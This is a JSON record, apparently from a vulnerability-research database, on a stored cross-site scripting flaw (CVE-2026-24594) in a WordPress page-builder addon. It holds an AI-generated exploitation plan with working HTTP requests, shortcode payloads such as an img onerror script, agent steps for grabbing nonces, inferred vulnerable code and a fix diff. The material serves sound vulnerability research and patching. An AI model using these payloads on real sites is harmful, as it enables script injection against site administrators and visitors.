[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7ZPDXDsvZvCwd8WXriFSnHNTnltgpfVfEg7fNTT0Jgg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-24594","livemesh-addons-for-wpbakery-page-builder-authenticated-editor-stored-cross-site-scripting","Livemesh Addons for WPBakery Page Builder \u003C= 3.9.4 - Authenticated (Editor+) Stored Cross-Site Scripting","The Livemesh Addons for WPBakery Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 
This only affects multi-site installations and installations where unfiltered_html has been disabled.","addons-for-visual-composer",null,"\u003C=3.9.4","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-15 00:00:00","2026-01-27 19:24:11",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdd773571-1f30-4b2b-8a0a-dde3ee1c53d9?source=api-prod",[],"researched",false,3,"This research plan focuses on **CVE-2026-24594**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Livemesh Addons for WPBakery Page Builder** plugin. This vulnerability is significant because it allows Editor-level users to bypass `unfiltered_html` restrictions (common in multisite or hardened environments) to execute arbitrary JavaScript in the context of other users, including Administrators.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Stored Cross-Site Scripting (XSS)\n*   **Location:** Attributes within Livemesh-specific WPBakery elements (Shortcodes).\n*   **Cause:** The plugin fails to sanitize user-provided attributes when saving WPBakery elements and fails to escape those attributes when rendering the generated HTML on the frontend.\n*   **Constraint:** This vulnerability is primarily relevant where `unfiltered_html` is disabled (e.g., WordPress Multisite or specific security configurations), as Editors\u002FAdmins would otherwise have the native capability to post HTML.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for updating posts) or the WordPress REST API `wp\u002Fv2\u002Fposts`.\n*   **Hook:** The vulnerability is triggered during the rendering of shortcodes registered by the plugin, typically via the `add_shortcode` API or WPBakery's element mapping.\n*   **Parameter:** Shortcode attributes (e.g., `title`, `description`, `link_url`, `heading`).\n*   **Authentication:** Requires **Editor** level or higher.\n*   **Preconditions:** \n    1.  The plugin **Livemesh Addons for WPBakery Page Builder** must be active.\n    2.  The user must have permission to edit posts.\n    3.  The environment must have `define( 'DISALLOW_UNFILTERED_HTML', true );` or be a Multisite installation to distinguish this from intended functionality.\n\n### 3. Code Flow (Inferred)\n1.  **Storage:** An Editor creates\u002Fedits a page using WPBakery. They add a Livemesh element (e.g., \"Services\" or \"Heading\"). WPBakery serializes these settings into a WordPress shortcode within the `post_content` (e.g., `[la_heading title=\"\u003Cscript>alert(1)\u003C\u002Fscript>\"]`).\n2.  **Processing:** When a user views the page, WordPress parses the content and calls the callback function associated with the `la_heading` shortcode.\n3.  **Rendering:**\n    *   The plugin class (likely inheriting from `WPBakeryShortCode`) calls a rendering method.\n    *   The method extracts `$atts` (attributes).\n    *   The plugin echoes the attribute directly: `echo '\u003Ch3 class=\"title\">' . $atts['title'] . '\u003C\u002Fh3>';` instead of using `esc_html($atts['title'])`.\n4.  **Execution:** The payload is rendered raw in the HTML response, executing in the visitor's browser.\n\n### 4. Nonce Acquisition Strategy\nSince this is an **Authenticated (Editor+)** vulnerability, the agent must first authenticate.\n1.  **Login:** Use `http_request` to POST to `wp-login.php` with Editor credentials.\n2.  
**Access Editor:** Navigate to `wp-admin\u002Fpost-new.php?post_type=page`.\n3.  **Extract Nonce:** Standard WordPress `_wpnonce` is required for post creation\u002Fupdates.\n    *   Action: `browser_navigate(\"wp-admin\u002Fpost-new.php?post_type=page\")`\n    *   Action: `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4.  **Plugin-Specific Context:** If the plugin uses a specific AJAX endpoint for saving element data, the agent should check for a localized JS variable.\n    *   Action: `browser_eval(\"window.lv_addons_data?.nonce\")` (Inferred localization key).\n\n### 5. Exploitation Strategy\n\n#### Step 1: Create a Post with XSS Payload\nThe agent will attempt to inject the payload via a common Livemesh shortcode. Based on typical Livemesh element names:\n\n*   **Shortcode Candidate:** `la_heading` or `la_service`\n*   **Payload:** `\u003Cimg src=x onerror=alert(document.domain)>`\n*   **Method:** Update a post's content via the WordPress REST API or `post.php`.\n\n**HTTP Request (REST API - Preferred):**\n```http\nPOST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002FID_HERE HTTP\u002F1.1\nContent-Type: application\u002Fjson\nAuthorization: Bearer [TOKEN] or Cookie-based\n\n{\n  \"content\": \"[la_heading title=\\\"\u003Cimg src=x onerror=alert(document.domain)>\\\"]\"\n}\n```\n\n**HTTP Request (`post.php`):**\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=editpost\n&post_ID=[ID]\n&_wpnonce=[NONCE]\n&content=[la_heading title=\"\u003Cimg src=x onerror=alert(document.domain)>\"]\n```\n\n#### Step 2: Trigger the XSS\nNavigate to the permalink of the created post.\n\n### 6. Test Data Setup\n1.  **Configuration:** Ensure `unfiltered_html` is disabled for the Editor.\n    *   CLI: `wp config set DISALLOW_UNFILTERED_HTML true --raw`\n2.  **User:** Create an Editor user.\n    *   CLI: `wp user create attacker editor@example.com --role=editor --user_pass=password123`\n3.  
**Post:** Create a target page.\n    *   CLI: `wp post create --post_type=page --post_status=publish --post_title=\"XSS Test\"`\n\n### 7. Expected Results\n1.  The HTTP request to save the post should return a `200 OK` or `302 Found`.\n2.  When visiting the page, the HTML source should contain:\n    `\u003Ch3 class=\"...\">\u003Cimg src=x onerror=alert(document.domain)>\u003C\u002Fh3>`\n3.  The browser should trigger an alert box showing the document domain.\n\n### 8. Verification Steps\n1.  **Database Check:** Verify the payload is stored raw in the database.\n    *   CLI: `wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test'\"`\n2.  **Frontend Check:** Use `http_request` to fetch the page and check for the unescaped payload.\n    *   Check if `&lt;` and `&gt;` are present (escaped) or `\u003C` and `>` (vulnerable).\n\n### 9. Alternative Approaches\nIf `la_heading` is patched or not present, try other common Livemesh elements:\n*   `[la_posts_grid]` (Attributes: `tax_term_ids`, `post_ids`)\n*   `[la_service_block]` (Attributes: `title`, `description`)\n*   `[la_portfolio_grid]` (Attributes: `title`)\n\nIf the Editor cannot access the REST API, use the `admin-ajax.php` endpoint that WPBakery uses to preview or save elements:\n*   **Action:** `vc_edit_form` or `vc_save_shortcode`.\n*   **Payload:** URL-encoded shortcode string in the `shortcode` parameter.","The Livemesh Addons for WPBakery Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping on shortcode attributes. 
Authenticated attackers with Editor-level access can inject arbitrary web scripts into pages when unfiltered_html is disabled, such as in multisite environments.","\u002F\u002F Likely located in includes\u002Felements\u002F (e.g., la-heading.php)\n\u002F\u002F The specific rendering functions fail to escape attribute variables before outputting to HTML\n\npublic function render_shortcode($atts, $content = null) {\n    $atts = shortcode_atts(array(\n        'title' => '',\n        'heading_style' => 'style1',\n    ), $atts);\n\n    $output = '\u003Cdiv class=\"la-heading ' . $atts['heading_style'] . '\">';\n    $output .= '\u003Ch3 class=\"title\">' . $atts['title'] . '\u003C\u002Fh3>'; \u002F\u002F Vulnerable attribute output\n    $output .= '\u003C\u002Fdiv>';\n\n    return $output;\n}","--- includes\u002Felements\u002Fla-heading.php\n+++ includes\u002Felements\u002Fla-heading.php\n@@ -10,3 +10,3 @@\n $output = '\u003Cdiv class=\"la-heading ' . esc_attr($atts['heading_style']) . '\">';\n-$output .= '\u003Ch3 class=\"title\">' . $atts['title'] . '\u003C\u002Fh3>';\n+$output .= '\u003Ch3 class=\"title\">' . esc_html($atts['title']) . '\u003C\u002Fh3>';\n $output .= '\u003C\u002Fdiv>';","The exploit requires authentication as an Editor or higher in an environment where the unfiltered_html capability is restricted (e.g., WordPress Multisite). An attacker can submit a request to create or update a post via the WordPress admin interface (wp-admin\u002Fpost.php) or the REST API. The payload is delivered by embedding a Livemesh-specific shortcode (such as [la_heading] or [la_service_block]) within the post content, assigning a malicious JavaScript string to one of its attributes (e.g., title=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"). 
When any user, including administrators, views the published post, the plugin's shortcode handler renders the unescaped attribute, causing the script to execute in the user's browser context.","gemini-3-flash-preview","2026-05-05 09:22:46","2026-05-05 09:23:13",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-visual-composer\u002Ftags"]